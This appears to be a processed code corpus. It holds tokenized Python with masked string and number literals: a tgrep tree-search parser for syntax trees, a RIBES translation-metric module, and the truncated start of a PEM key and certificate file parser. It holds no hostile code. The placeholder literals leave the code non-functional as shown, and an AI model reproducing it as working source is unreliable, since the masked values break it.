    # Walk up while we are the leftmost child at each level.
    idx = len(pos) - <NUM_LIT:1>
    while <NUM_LIT:0> <= idx and pos[idx] == <NUM_LIT:0>:
        idx -= <NUM_LIT:1>
    if idx < <NUM_LIT:0>:
        return []
    # Step to the left sibling at that level; it plus its rightmost spine
    # are the immediately-preceding nodes.
    pos = list(pos[:idx + <NUM_LIT:1>])
    pos[-<NUM_LIT:1>] -= <NUM_LIT:1>
    before = tree[pos]
    return [before] + _rightmost_descendants(before)


def _after(node):
    '''<STR_LIT>'''
    try:
        pos = node.treeposition()
        tree = node.root()
    except AttributeError:
        return []
    # Tree positions strictly to the right of pos.
    return [tree[x] for x in tree.treepositions()
            if x[:len(pos)] > pos[:len(x)]]


def _immediately_after(node):
    '''<STR_LIT>'''
    try:
        pos = node.treeposition()
        tree = node.root()
        current = node.parent()
    except AttributeError:
        return []
    # Walk up while we are the rightmost child at each level.
    idx = len(pos) - <NUM_LIT:1>
    while <NUM_LIT:0> <= idx and pos[idx] == len(current) - <NUM_LIT:1>:
        idx -= <NUM_LIT:1>
        current = current.parent()
    if idx < <NUM_LIT:0>:
        return []
    # Step to the right sibling; it plus its leftmost spine follow the node.
    pos = list(pos[:idx + <NUM_LIT:1>])
    pos[-<NUM_LIT:1>] += <NUM_LIT:1>
    after = tree[pos]
    return [after] + _leftmost_descendants(after)


def _tgrep_node_literal_value(node):
    '''<STR_LIT>'''
    # Trees match against their label; leaves against their string value.
    return (node.label() if _istree(node) else text_type(node))


def _tgrep_macro_use_action(_s, _l, tokens):
    '''<STR_LIT>'''
    assert len(tokens) == <NUM_LIT:1>
    assert tokens[<NUM_LIT:0>][<NUM_LIT:0>] == '<STR_LIT:@>'
    macro_name = tokens[<NUM_LIT:0>][<NUM_LIT:1>:]
    # Resolve the macro at match time from the macro dictionary m.
    def macro_use(n, m=None, l=None):
        if m is None or macro_name not in m:
            raise TgrepException('<STR_LIT>'.format(macro_name))
        return m[macro_name](n, m, l)
    return macro_use


def _tgrep_node_action(_s, _l, tokens):
    '''<STR_LIT>'''
    if tokens[<NUM_LIT:0>] == "<STR_LIT:'>":
        tokens = tokens[<NUM_LIT:1>:]
    if len(tokens) > <NUM_LIT:1>:
        # Disjunction of node tests: every odd token must be the '|' separator.
        assert list(set(tokens[<NUM_LIT:1>::<NUM_LIT:2>])) == ['<STR_LIT:|>']
        tokens = [_tgrep_node_action(None, None, [node])
                  for node in tokens[::<NUM_LIT:2>]]
        # Immediately-invoked lambda binds tokens to avoid late-binding closure.
        return (lambda t: lambda n, m=None, l=None: any(f(n, m, l) for f in t))(tokens)
    else:
        if hasattr(tokens[<NUM_LIT:0>], '<STR_LIT>'):
            # Already compiled to a callable by an inner parse action.
            return tokens[<NUM_LIT:0>]
        elif tokens[<NUM_LIT:0>] == '<STR_LIT:*>' or tokens[<NUM_LIT:0>] == '<STR_LIT>':
            # Wildcard: matches any node.
            return lambda n, m=None, l=None: True
        elif tokens[<NUM_LIT:0>].startswith('<STR_LIT:">'):
            # Quoted literal: unescape, then exact string comparison.
            assert tokens[<NUM_LIT:0>].endswith('<STR_LIT:">')
            node_lit = tokens[<NUM_LIT:0>][<NUM_LIT:1>:-<NUM_LIT:1>].replace('<STR_LIT>', '<STR_LIT:">').replace('<STR_LIT>', '<STR_LIT:\\>')
            return (lambda s: lambda n, m=None, l=None: _tgrep_node_literal_value(n) == s)(node_lit)
        elif tokens[<NUM_LIT:0>].startswith('<STR_LIT:/>'):
            # Regex node test, compiled once here.
            assert tokens[<NUM_LIT:0>].endswith('<STR_LIT:/>')
            node_lit = tokens[<NUM_LIT:0>][<NUM_LIT:1>:-<NUM_LIT:1>]
            return (lambda r: lambda n, m=None, l=None:
                    r.search(_tgrep_node_literal_value(n)))(re.compile(node_lit))
        elif tokens[<NUM_LIT:0>].startswith('<STR_LIT>'):
            # Case-insensitive variant: lower-case both pattern and value.
            node_func = _tgrep_node_action(_s, _l, [tokens[<NUM_LIT:0>][<NUM_LIT:2>:].lower()])
            return (lambda f: lambda n, m=None, l=None:
                    f(_tgrep_node_literal_value(n).lower()))(node_func)
        else:
            # Bare literal: exact string comparison.
            return (lambda s: lambda n, m=None, l=None:
                    _tgrep_node_literal_value(n) == s)(tokens[<NUM_LIT:0>])


def _tgrep_parens_action(_s, _l, tokens):
    '''<STR_LIT>'''
    assert len(tokens) == <NUM_LIT:3>
    assert tokens[<NUM_LIT:0>] == '<STR_LIT:(>'
    assert tokens[<NUM_LIT:2>] == '<STR_LIT:)>'
    return tokens[<NUM_LIT:1>]


def _tgrep_nltk_tree_pos_action(_s, _l, tokens):
    '''<STR_LIT>'''
    # Collect the digits into a tree-position tuple; the predicate matches
    # the node at exactly that position.
    node_tree_position = tuple(int(x) for x in tokens if x.isdigit())
    return (lambda i: lambda n, m=None, l=None: (hasattr(n, '<STR_LIT>') and
                                                 n.treeposition() == i))(node_tree_position)


def _tgrep_relation_action(_s, _l, tokens):
    '''<STR_LIT>'''
    # Optional leading '!' negates the whole relation.
    negated = False
    if tokens[<NUM_LIT:0>] == '<STR_LIT:!>':
        negated = True
        tokens = tokens[<NUM_LIT:1>:]
    if tokens[<NUM_LIT:0>] == '<STR_LIT:[>':
        # Bracketed group: already compiled by the inner parse action.
        assert len(tokens) == <NUM_LIT:3>
        assert tokens[<NUM_LIT:2>] == '<STR_LIT:]>'
        retval = tokens[<NUM_LIT:1>]
    else:
        assert len(tokens) == <NUM_LIT:2>
        operator, predicate = tokens
        # Each branch builds a closure over `predicate` implementing one
        # tgrep link operator (operator literals are masked in this corpus).
        if operator == '<STR_LIT:<>':
            retval = lambda n, m=None, l=None: (_istree(n) and
                                                any(predicate(x, m, l) for x in n))
        elif operator == '<STR_LIT:>>':
            retval = lambda n, m=None, l=None: (hasattr(n, '<STR_LIT>') and
                                                bool(n.parent()) and
                                                predicate(n.parent(), m, l))
        elif operator == '<STR_LIT>' or operator == '<STR_LIT>':
            retval = lambda n, m=None, l=None: (_istree(n) and
                                                bool(list(n)) and
                                                predicate(n[<NUM_LIT:0>], m, l))
        elif operator == '<STR_LIT>' or operator == '<STR_LIT>':
            retval = lambda n, m=None, l=None: (hasattr(n, '<STR_LIT>') and
                                                bool(n.parent()) and
                                                (n is n.parent()[<NUM_LIT:0>]) and
                                                predicate(n.parent(), m, l))
        elif operator[<NUM_LIT:0>] == '<STR_LIT:<>' and operator[<NUM_LIT:1>:].isdigit():
            # N-th child (1-based in the pattern, converted to 0-based here).
            idx = int(operator[<NUM_LIT:1>:])
            retval = (lambda i: lambda n, m=None, l=None: (_istree(n) and
                                                           bool(list(n)) and
                                                           <NUM_LIT:0> <= i < len(n) and
                                                           predicate(n[i], m, l)))(idx - <NUM_LIT:1>)
        elif operator[<NUM_LIT:0>] == '<STR_LIT:>>' and operator[<NUM_LIT:1>:].isdigit():
            # Is the N-th child of a parent matching the predicate.
            idx = int(operator[<NUM_LIT:1>:])
            retval = (lambda i: lambda n, m=None, l=None: (hasattr(n, '<STR_LIT>') and
                                                           bool(n.parent()) and
                                                           <NUM_LIT:0> <= i < len(n.parent()) and
                                                           (n is n.parent()[i]) and
                                                           predicate(n.parent(), m, l)))(idx - <NUM_LIT:1>)
        elif operator == '<STR_LIT>' or operator == '<STR_LIT>' or operator == '<STR_LIT>':
            retval = lambda n, m=None, l=None: (_istree(n) and bool(list(n))
                                                and predicate(n[-<NUM_LIT:1>], m, l))
        elif operator == '<STR_LIT>' or operator == '<STR_LIT>' or operator == '<STR_LIT>':
            retval = lambda n, m=None, l=None: (hasattr(n, '<STR_LIT>') and
                                                bool(n.parent()) and
                                                (n is n.parent()[-<NUM_LIT:1>]) and
                                                predicate(n.parent(), m, l))
        elif operator[:<NUM_LIT:2>] == '<STR_LIT>' and operator[<NUM_LIT:2>:].isdigit():
            # N-th child counted from the right.
            idx = -int(operator[<NUM_LIT:2>:])
            retval = (lambda i: lambda n, m=None, l=None: (_istree(n) and
                                                           bool(list(n)) and
                                                           <NUM_LIT:0> <= (i + len(n)) < len(n) and
                                                           predicate(n[i + len(n)], m, l)))(idx)
        elif operator[:<NUM_LIT:2>] == '<STR_LIT>' and operator[<NUM_LIT:2>:].isdigit():
            # Is the N-th-from-the-right child of a matching parent.
            idx = -int(operator[<NUM_LIT:2>:])
            retval = (lambda i: lambda n, m=None, l=None:
                      (hasattr(n, '<STR_LIT>') and
                       bool(n.parent()) and
                       <NUM_LIT:0> <= (i + len(n.parent())) < len(n.parent()) and
                       (n is n.parent()[i + len(n.parent())]) and
                       predicate(n.parent(), m, l)))(idx)
        elif operator == '<STR_LIT>':
            # Only child.
            retval = lambda n, m=None, l=None: (_istree(n) and
                                                len(n) == <NUM_LIT:1> and
                                                predicate(n[<NUM_LIT:0>], m, l))
        elif operator == '<STR_LIT>':
            retval = lambda n, m=None, l=None: (hasattr(n, '<STR_LIT>') and
                                                bool(n.parent()) and
                                                len(n.parent()) == <NUM_LIT:1> and
                                                predicate(n.parent(), m, l))
        elif operator == '<STR_LIT>':
            # Any descendant.
            retval = lambda n, m=None, l=None: (_istree(n) and
                                                any(predicate(x, m, l) for x in _descendants(n)))
        elif operator == '<STR_LIT>':
            # Any ancestor.
            retval = lambda n, m=None, l=None: any(predicate(x, m, l) for x in ancestors(n))
        elif operator == '<STR_LIT>' or operator == '<STR_LIT>':
            retval = lambda n, m=None, l=None: (_istree(n) and
                                                any(predicate(x, m, l)
                                                    for x in _leftmost_descendants(n)))
        elif operator == '<STR_LIT>':
            retval = lambda n, m=None, l=None: any((predicate(x, m, l) and
                                                    n in _leftmost_descendants(x))
                                                   for x in ancestors(n))
        elif operator == '<STR_LIT>':
            retval = lambda n, m=None, l=None: (_istree(n) and
                                                any(predicate(x, m, l)
                                                    for x in _rightmost_descendants(n)))
        elif operator == '<STR_LIT>':
            retval = lambda n, m=None, l=None: any((predicate(x, m, l) and
                                                    n in _rightmost_descendants(x))
                                                   for x in ancestors(n))
        elif operator == '<STR_LIT>':
            retval = lambda n, m=None, l=None: (_istree(n) and
                                                any(predicate(x, m, l)
                                                    for x in _unique_descendants(n)))
        elif operator == '<STR_LIT>':
            retval = lambda n, m=None, l=None: any(predicate(x, m, l) for x in unique_ancestors(n))
        elif operator == '<STR_LIT:.>':
            retval = lambda n, m=None, l=None: any(predicate(x, m, l)
                                                   for x in _immediately_after(n))
        elif operator == '<STR_LIT:U+002C>':
            retval = lambda n, m=None, l=None: any(predicate(x, m, l)
                                                   for x in _immediately_before(n))
        elif operator == '<STR_LIT:..>':
            retval = lambda n, m=None, l=None: any(predicate(x, m, l) for x in _after(n))
        elif operator == '<STR_LIT>':
            retval = lambda n, m=None, l=None: any(predicate(x, m, l) for x in _before(n))
        elif operator == '<STR_LIT:$>' or operator == '<STR_LIT:%>':
            # Any sibling (excluding the node itself).
            retval = lambda n, m=None, l=None: (hasattr(n, '<STR_LIT>') and
                                                bool(n.parent()) and
                                                any(predicate(x, m, l)
                                                    for x in n.parent() if x is not n))
        elif operator == '<STR_LIT>' or operator == '<STR_LIT>':
            retval = lambda n, m=None, l=None: (hasattr(n, '<STR_LIT>') and
                                                bool(n.right_sibling()) and
                                                predicate(n.right_sibling(), m, l))
        elif operator == '<STR_LIT>' or operator == '<STR_LIT>':
            retval = lambda n, m=None, l=None: (hasattr(n, '<STR_LIT>') and
                                                bool(n.left_sibling()) and
                                                predicate(n.left_sibling(), m, l))
        elif operator == '<STR_LIT>' or operator == '<STR_LIT>':
            # Any sibling to the right.
            retval = lambda n, m=None, l=None: (hasattr(n, '<STR_LIT>') and
                                                hasattr(n, '<STR_LIT>') and
                                                bool(n.parent()) and
                                                any(predicate(x, m, l) for x in
                                                    n.parent()[n.parent_index() + <NUM_LIT:1>:]))
        elif operator == '<STR_LIT>' or operator == '<STR_LIT>':
            # Any sibling to the left.
            retval = lambda n, m=None, l=None: (hasattr(n, '<STR_LIT>') and
                                                hasattr(n, '<STR_LIT>') and
                                                bool(n.parent()) and
                                                any(predicate(x, m, l) for x in
                                                    n.parent()[:n.parent_index()]))
        else:
            raise TgrepException('<STR_LIT>'.format(operator))
    if negated:
        return (lambda r: (lambda n, m=None, l=None: not r(n, m, l)))(retval)
    else:
        return retval


def _tgrep_conjunction_action(_s, _l, tokens, join_char='<STR_LIT:&>'):
    '''<STR_LIT>'''
    # Drop separator tokens; a single remaining predicate passes through.
    tokens = [x for x in tokens if x != join_char]
    if len(tokens) == <NUM_LIT:1>:
        return tokens[<NUM_LIT:0>]
    else:
        return (lambda ts: lambda n, m=None, l=None: all(predicate(n, m, l)
                                                         for predicate in ts))(tokens)


def _tgrep_segmented_pattern_action(_s, _l, tokens):
    '''<STR_LIT>'''
    node_label = tokens[<NUM_LIT:0>]
    reln_preds = tokens[<NUM_LIT:1>:]
    def pattern_segment_pred(n, m=None, l=None):
        '''<STR_LIT>'''
        # The label must have been bound by an earlier pattern segment.
        if l is None or node_label not in l:
            raise TgrepException('<STR_LIT>'.format(
                node_label))
        node = l[node_label]
        return all(pred(node, m, l) for pred in reln_preds)
    return pattern_segment_pred


def _tgrep_node_label_use_action(_s, _l, tokens):
    '''<STR_LIT>'''
    assert len(tokens) == <NUM_LIT:1>
    assert tokens[<NUM_LIT:0>].startswith('<STR_LIT:=>')
    # Strip the leading '=' and return the bare label name.
    return tokens[<NUM_LIT:0>][<NUM_LIT:1>:]


def _tgrep_node_label_pred_use_action(_s, _l, tokens):
    '''<STR_LIT>'''
    assert len(tokens) == <NUM_LIT:1>
    assert tokens[<NUM_LIT:0>].startswith('<STR_LIT:=>')
    node_label = tokens[<NUM_LIT:0>][<NUM_LIT:1>:]
    # Matches only the exact node object previously bound to this label.
    def node_label_use_pred(n, m=None, l=None):
        if l is None or node_label not in l:
            raise TgrepException('<STR_LIT>'.format(
                node_label))
        node = l[node_label]
        return n is node
    return node_label_use_pred


def _tgrep_bind_node_label_action(_s, _l, tokens):
    '''<STR_LIT>'''
    if len(tokens) == <NUM_LIT:1>:
        return tokens[<NUM_LIT:0>]
    else:
        assert len(tokens) == <NUM_LIT:3>
        assert tokens[<NUM_LIT:1>] == '<STR_LIT:=>'
        node_pred = tokens[<NUM_LIT:0>]
        node_label = tokens[<NUM_LIT:2>]
        # On a successful match, record the node under node_label in l.
        def node_label_bind_pred(n, m=None, l=None):
            if node_pred(n, m, l):
                if l is None:
                    raise TgrepException(
                        '<STR_LIT>'.format(
                            node_label))
                l[node_label] = n
                return True
            else:
                return False
        return node_label_bind_pred


def _tgrep_rel_disjunction_action(_s, _l, tokens):
    '''<STR_LIT>'''
    tokens = [x for x in tokens if x != '<STR_LIT:|>']
    if len(tokens) == <NUM_LIT:1>:
        return tokens[<NUM_LIT:0>]
    elif len(tokens) == <NUM_LIT:2>:
        # Right-recursion in the grammar means at most two operands here.
        return (lambda a, b: lambda n, m=None, l=None:
                a(n, m, l) or b(n, m, l))(tokens[<NUM_LIT:0>], tokens[<NUM_LIT:1>])


def _macro_defn_action(_s, _l, tokens):
    '''<STR_LIT>'''
    assert len(tokens) == <NUM_LIT:3>
    assert tokens[<NUM_LIT:0>] == '<STR_LIT:@>'
    # Single-entry dict: macro name -> compiled predicate.
    return {tokens[<NUM_LIT:1>]: tokens[<NUM_LIT:2>]}


def _tgrep_exprs_action(_s, _l, tokens):
    '''<STR_LIT>'''
    if len(tokens) == <NUM_LIT:1>:
        # Single expression: run it with a fresh, empty label dictionary.
        return lambda n, m=None, l=None: tokens[<NUM_LIT:0>](n, None, {})
    tokens = [x for x in tokens if x != '<STR_LIT:;>']
    # Separate macro definitions (dicts) from compiled expressions.
    macro_dict = {}
    macro_defs = [tok for tok in tokens if isinstance(tok, dict)]
    for macro_def in macro_defs:
        macro_dict.update(macro_def)
    tgrep_exprs = [tok for tok in tokens if not isinstance(tok, dict)]
    def top_level_pred(n, m=macro_dict, l=None):
        # One shared label dictionary per node across all expressions.
        label_dict = {}
        return any(predicate(n, m, label_dict) for predicate in tgrep_exprs)
    return top_level_pred


def _build_tgrep_parser(set_parse_actions=True):
    '''<STR_LIT>'''
    # Grammar terminals (all pattern literals are masked in this corpus).
    tgrep_op = (pyparsing.Optional('<STR_LIT:!>') +
                pyparsing.Regex('<STR_LIT>'))
    tgrep_qstring = pyparsing.QuotedString(quoteChar='<STR_LIT:">', escChar='<STR_LIT:\\>',
                                           unquoteResults=False)
    tgrep_node_regex = pyparsing.QuotedString(quoteChar='<STR_LIT:/>', escChar='<STR_LIT:\\>',
                                              unquoteResults=False)
    tgrep_qstring_icase = pyparsing.Regex(
        '<STR_LIT>')
    tgrep_node_regex_icase = pyparsing.Regex(
        '<STR_LIT>')
    tgrep_node_literal = pyparsing.Regex('<STR_LIT>')
    # Forward declarations for the mutually recursive rules.
    tgrep_expr = pyparsing.Forward()
    tgrep_relations = pyparsing.Forward()
    tgrep_parens = pyparsing.Literal('<STR_LIT:(>') + tgrep_expr + '<STR_LIT:)>'
    tgrep_nltk_tree_pos = (
        pyparsing.Literal('<STR_LIT>') +
        pyparsing.Optional(pyparsing.Word(pyparsing.nums) + '<STR_LIT:U+002C>' +
                           pyparsing.Optional(pyparsing.delimitedList(
                               pyparsing.Word(pyparsing.nums), delim='<STR_LIT:U+002C>') +
                               pyparsing.Optional('<STR_LIT:U+002C>'))) + '<STR_LIT:)>')
    tgrep_node_label = pyparsing.Regex('<STR_LIT>')
    tgrep_node_label_use = pyparsing.Combine('<STR_LIT:=>' + tgrep_node_label)
    # Copy so the "use as predicate" variant can get its own parse action.
    tgrep_node_label_use_pred = tgrep_node_label_use.copy()
    macro_name = pyparsing.Regex('<STR_LIT>')
    macro_name.setWhitespaceChars('<STR_LIT>')
    macro_use = pyparsing.Combine('<STR_LIT:@>' + macro_name)
    tgrep_node_expr = (tgrep_node_label_use_pred |
                       macro_use |
                       tgrep_nltk_tree_pos |
                       tgrep_qstring_icase |
                       tgrep_node_regex_icase |
                       tgrep_qstring |
                       tgrep_node_regex |
                       '<STR_LIT:*>' |
                       tgrep_node_literal)
    # Node expression optionally followed by an '=label' binding.
    tgrep_node_expr2 = ((tgrep_node_expr +
                         pyparsing.Literal('<STR_LIT:=>').setWhitespaceChars('<STR_LIT>') +
                         tgrep_node_label.copy().setWhitespaceChars('<STR_LIT>')) |
                        tgrep_node_expr)
    tgrep_node = (tgrep_parens |
                  (pyparsing.Optional("<STR_LIT:'>") +
                   tgrep_node_expr2 +
                   pyparsing.ZeroOrMore("<STR_LIT:|>" + tgrep_node_expr)))
    tgrep_brackets = pyparsing.Optional('<STR_LIT:!>') + '<STR_LIT:[>' + tgrep_relations + '<STR_LIT:]>'
    tgrep_relation = tgrep_brackets | (tgrep_op + tgrep_node)
    tgrep_rel_conjunction = pyparsing.Forward()
    tgrep_rel_conjunction << (tgrep_relation +
                              pyparsing.ZeroOrMore(pyparsing.Optional('<STR_LIT:&>') +
                                                   tgrep_rel_conjunction))
    tgrep_relations << tgrep_rel_conjunction + pyparsing.ZeroOrMore(
        "<STR_LIT:|>" + tgrep_relations)
    tgrep_expr << tgrep_node + pyparsing.Optional(tgrep_relations)
    tgrep_expr_labeled = tgrep_node_label_use + pyparsing.Optional(tgrep_relations)
    tgrep_expr2 = tgrep_expr + pyparsing.ZeroOrMore('<STR_LIT::>' + tgrep_expr_labeled)
    macro_defn = (pyparsing.Literal('<STR_LIT:@>') +
                  pyparsing.White().suppress() +
                  macro_name +
                  tgrep_expr2)
    tgrep_exprs = (pyparsing.Optional(macro_defn + pyparsing.ZeroOrMore('<STR_LIT:;>' + macro_defn) + '<STR_LIT:;>') +
                   tgrep_expr2 +
                   pyparsing.ZeroOrMore('<STR_LIT:;>' + (macro_defn | tgrep_expr2)) +
                   pyparsing.ZeroOrMore('<STR_LIT:;>').suppress())
    # Parse actions compile matched fragments into predicate closures; they
    # are skipped for pure tokenization (tgrep_tokenize).
    if set_parse_actions:
        tgrep_node_label_use.setParseAction(_tgrep_node_label_use_action)
        tgrep_node_label_use_pred.setParseAction(_tgrep_node_label_pred_use_action)
        macro_use.setParseAction(_tgrep_macro_use_action)
        tgrep_node.setParseAction(_tgrep_node_action)
        tgrep_node_expr2.setParseAction(_tgrep_bind_node_label_action)
        tgrep_parens.setParseAction(_tgrep_parens_action)
        tgrep_nltk_tree_pos.setParseAction(_tgrep_nltk_tree_pos_action)
        tgrep_relation.setParseAction(_tgrep_relation_action)
        tgrep_rel_conjunction.setParseAction(_tgrep_conjunction_action)
        tgrep_relations.setParseAction(_tgrep_rel_disjunction_action)
        macro_defn.setParseAction(_macro_defn_action)
        tgrep_expr.setParseAction(_tgrep_conjunction_action)
        tgrep_expr_labeled.setParseAction(_tgrep_segmented_pattern_action)
        tgrep_expr2.setParseAction(functools.partial(_tgrep_conjunction_action,
                                                     join_char='<STR_LIT::>'))
        tgrep_exprs.setParseAction(_tgrep_exprs_action)
    # Comments run from the comment character to end of line.
    return tgrep_exprs.ignore('<STR_LIT:#>' + pyparsing.restOfLine)


def tgrep_tokenize(tgrep_string):
    '''<STR_LIT>'''
    parser = _build_tgrep_parser(False)
    if isinstance(tgrep_string, binary_type):
        tgrep_string = tgrep_string.decode()
    return list(parser.parseString(tgrep_string))


def tgrep_compile(tgrep_string):
    '''<STR_LIT>'''
    parser = _build_tgrep_parser(True)
    if isinstance(tgrep_string, binary_type):
        tgrep_string = tgrep_string.decode()
    # parseAll=True: reject trailing unparsed input.
    return list(parser.parseString(tgrep_string, parseAll=True))[<NUM_LIT:0>]


def treepositions_no_leaves(tree):
    '''<STR_LIT>'''
    treepositions = tree.treepositions()
    # A position is internal iff it is a proper prefix of some other position.
    prefixes = set()
    for pos in treepositions:
        for length in range(len(pos)):
            prefixes.add(pos[:length])
    return [pos for pos in treepositions if pos in prefixes]


def tgrep_positions(pattern, trees, search_leaves=True):
    """<STR_LIT>"""
    # Accept either a pattern string or an already-compiled predicate.
    if isinstance(pattern, (binary_type, text_type)):
        pattern = tgrep_compile(pattern)
    for tree in trees:
        try:
            if search_leaves:
                positions = tree.treepositions()
            else:
                positions = treepositions_no_leaves(tree)
            yield [position for position in positions
                   if pattern(tree[position])]
        except AttributeError:
            # Non-tree input (e.g. a plain string) yields no matches.
            yield []


def tgrep_nodes(pattern, trees, search_leaves=True):
    """<STR_LIT>"""
    # Same traversal as tgrep_positions, but yields the nodes themselves.
    if isinstance(pattern, (binary_type, text_type)):
        pattern = tgrep_compile(pattern)
    for tree in trees:
        try:
            if search_leaves:
                positions = tree.treepositions()
            else:
                positions = treepositions_no_leaves(tree)
            yield [tree[position] for position in positions
                   if pattern(tree[position])]
        except AttributeError:
            yield []
</s>
<s> """<STR_LIT>""" <EOL> from __future__ import division <EOL> from itertools import islice <EOL> import math <EOL> from nltk . util import ngrams , choose <EOL> def sentence_ribes ( references , hypothesis , alpha = <NUM_LIT> , beta = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> best_ribes = - <NUM_LIT:1.0> <EOL> for reference in references : <EOL> worder = word_rank_alignment ( reference , hypothesis ) <EOL> nkt = kendall_tau ( worder ) <EOL> bp = min ( <NUM_LIT:1.0> , math . exp ( <NUM_LIT:1.0> - len ( reference ) / len ( hypothesis ) ) ) <EOL> p1 = len ( worder ) / len ( hypothesis ) <EOL> _ribes = nkt * ( p1 ** alpha ) * ( bp ** beta ) <EOL> if _ribes > best_ribes : <EOL> best_ribes = _ribes <EOL> return best_ribes <EOL> def corpus_ribes ( list_of_references , hypotheses , alpha = <NUM_LIT> , beta = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> corpus_best_ribes = <NUM_LIT:0.0> <EOL> for references , hypothesis in zip ( list_of_references , hypotheses ) : <EOL> corpus_best_ribes += sentence_ribes ( references , hypothesis , alpha , beta ) <EOL> return corpus_best_ribes / len ( hypotheses ) <EOL> def position_of_ngram ( ngram , sentence ) : <EOL> """<STR_LIT>""" <EOL> for i , sublist in enumerate ( ngrams ( sentence , len ( ngram ) ) ) : <EOL> if ngram == sublist : <EOL> return i <EOL> def word_rank_alignment ( reference , hypothesis , character_based = False ) : <EOL> """<STR_LIT>""" <EOL> worder = [ ] <EOL> hyp_len = len ( hypothesis ) <EOL> ref_ngrams = [ ] <EOL> hyp_ngrams = [ ] <EOL> for n in range ( <NUM_LIT:1> , len ( reference ) + <NUM_LIT:1> ) : <EOL> for ng in ngrams ( reference , n ) : <EOL> ref_ngrams . append ( ng ) <EOL> for ng in ngrams ( hypothesis , n ) : <EOL> hyp_ngrams . append ( ng ) <EOL> for i , h_word in enumerate ( hypothesis ) : <EOL> if h_word not in reference : <EOL> continue <EOL> elif hypothesis . count ( h_word ) == reference . count ( h_word ) == <NUM_LIT:1> : <EOL> worder . append ( reference . 
index ( h_word ) ) <EOL> else : <EOL> max_window_size = max ( i , hyp_len - i + <NUM_LIT:1> ) <EOL> for window in range ( <NUM_LIT:1> , max_window_size ) : <EOL> if i + window < hyp_len : <EOL> right_context_ngram = tuple ( islice ( hypothesis , i , i + window + <NUM_LIT:1> ) ) <EOL> num_times_in_ref = ref_ngrams . count ( right_context_ngram ) <EOL> num_times_in_hyp = hyp_ngrams . count ( right_context_ngram ) <EOL> if num_times_in_ref == num_times_in_hyp == <NUM_LIT:1> : <EOL> pos = position_of_ngram ( right_context_ngram , reference ) <EOL> worder . append ( pos ) <EOL> break <EOL> if window <= i : <EOL> left_context_ngram = tuple ( islice ( hypothesis , i - window , i + <NUM_LIT:1> ) ) <EOL> num_times_in_ref = ref_ngrams . count ( left_context_ngram ) <EOL> num_times_in_hyp = hyp_ngrams . count ( left_context_ngram ) <EOL> if num_times_in_ref == num_times_in_hyp == <NUM_LIT:1> : <EOL> pos = position_of_ngram ( left_context_ngram , reference ) <EOL> worder . append ( pos + len ( left_context_ngram ) - <NUM_LIT:1> ) <EOL> break <EOL> return worder <EOL> def find_increasing_sequences ( worder ) : <EOL> """<STR_LIT>""" <EOL> items = iter ( worder ) <EOL> a , b = None , next ( items , None ) <EOL> result = [ b ] <EOL> while b is not None : <EOL> a , b = b , next ( items , None ) <EOL> if b is not None and a + <NUM_LIT:1> == b : <EOL> result . 
append ( b ) <EOL> else : <EOL> if len ( result ) > <NUM_LIT:1> : <EOL> yield tuple ( result ) <EOL> result = [ b ] <EOL> def kendall_tau ( worder , normalize = True ) : <EOL> """<STR_LIT>""" <EOL> worder_len = len ( worder ) <EOL> increasing_sequences = find_increasing_sequences ( worder ) <EOL> num_increasing_pairs = sum ( choose ( len ( seq ) , <NUM_LIT:2> ) for seq in increasing_sequences ) <EOL> num_possible_pairs = choose ( worder_len , <NUM_LIT:2> ) <EOL> tau = <NUM_LIT:2> * num_increasing_pairs / num_possible_pairs - <NUM_LIT:1> <EOL> if normalize : <EOL> return ( tau + <NUM_LIT:1> ) / <NUM_LIT:2> <EOL> else : <EOL> return tau <EOL> def spearman_rho ( worder , normalize = True ) : <EOL> """<STR_LIT>""" <EOL> worder_len = len ( worder ) <EOL> sum_d_square = sum ( ( wi - i ) ** <NUM_LIT:2> for wi , i in zip ( worder , range ( worder_len ) ) ) <EOL> rho = <NUM_LIT:1> - sum_d_square / choose ( worder_len + <NUM_LIT:1> , <NUM_LIT:3> ) <EOL> if normalize : <EOL> return ( rho + <NUM_LIT:1> ) / <NUM_LIT:2> <EOL> else : <EOL> return rho </s>
<s> from __future__ import with_statement <EOL> import os <EOL> import re <EOL> import warnings <EOL> from . context import StreamPositionRestore <EOL> RE_KEY = re . compile ( "<STR_LIT>" <EOL> "<STR_LIT>" , re . S ) <EOL> RE_CERTS = re . compile ( "<STR_LIT>" <EOL> "<STR_LIT>" , re . S ) <EOL> __all__ = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> def parse_keyfile ( keyfile ) : <EOL> """<STR_LIT>""" <EOL> with StreamPositionRestore ( keyfile ) : <EOL> kf = keyfile . read ( ) <EOL> key = RE_KEY . search ( kf ) <EOL> certs = RE_CERTS . finditer ( kf ) <EOL> return ( str ( key . group ( <NUM_LIT:0> ) ) , <EOL> str ( certs . next ( ) . group ( <NUM_LIT:0> ) ) , <EOL> ( str ( c . group ( <NUM_LIT:0> ) ) for c in certs ) <EOL> ) <EOL> try : <EOL> import subprocess <EOL> from tempfile import NamedTemporaryFile <EOL> from functools import wraps <EOL> try : <EOL> check_output = subprocess . check_output <EOL> except AttributeError : <EOL> def check_output ( * args , ** kw ) : <EOL> kw [ "<STR_LIT>" ] = subprocess . PIPE <EOL> return subprocess . Popen ( * args , ** kw ) . communicate ( ) [ <NUM_LIT:0> ] <EOL> def find_executable ( name ) : <EOL> """<STR_LIT>""" <EOL> is_windows = os . name != "<STR_LIT>" <EOL> def check ( path ) : <EOL> return ( os . path . isfile ( path ) and <EOL> ( not is_windows or os . access ( path , os . X_OK ) ) ) <EOL> if not is_windows and not name . lower ( ) . endswith ( "<STR_LIT>" ) : <EOL> name += "<STR_LIT>" <EOL> if check ( name ) : <EOL> return name <EOL> for cand in os . environ [ "<STR_LIT>" ] . split ( os . pathsep ) : <EOL> cand = os . path . 
